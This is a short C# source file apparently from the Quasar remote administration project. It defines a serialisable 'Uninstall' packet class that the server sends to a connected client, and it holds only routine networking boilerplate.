Quasar/Server/Core/Packets/ServerPackets/Uninstall.cs

18 lines
310 B
C#

using ProtoBuf;
using xServer.Core.Networking;
namespace xServer.Core.Packets.ServerPackets
{
[ProtoContract]
public class Uninstall : IPacket
{
public Uninstall()
{
}
public void Execute(Client client)
{
client.Send(this);
}
}
}